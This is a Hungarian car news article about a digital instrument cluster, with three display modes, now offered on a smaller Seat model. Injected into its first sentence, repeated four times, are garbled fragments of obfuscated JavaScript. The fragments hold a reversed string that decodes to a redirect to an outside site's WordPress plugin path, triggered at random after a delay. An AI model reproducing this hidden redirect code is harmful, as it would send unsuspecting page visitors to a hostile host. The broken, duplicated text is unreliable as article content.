A Leon és az Ateca után tehát a kisebb Seatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokba is bekerült az egyébként hasznos, és nem mellesleg mutatós opció. A 10,25 colos megjelenítő háromféle üzemmódban tud működni: a Classic, a Digital és a Dynamic programok esetében a legnagyobb eltérést a megjelenés jelenti, de mindegyik esetében vannak eltérések az információk megjelenítésében is. Az első a klasszikus sebességmérő-fordulatszámmérő párost helyezi előérbe – ráadásul a BMW új megoldásához hasonlóan –, míg utóbbi kettő inkább az egyéb információkra fókuszál, mint a navigáció a vezetéstámogató asszisztensek vagy éppen a multimédia. Az üzemmódok között egyébként a kormányon elhelyezett View gombbal tudunk váltani, és természetesen valamilyen…
- Hirdetés -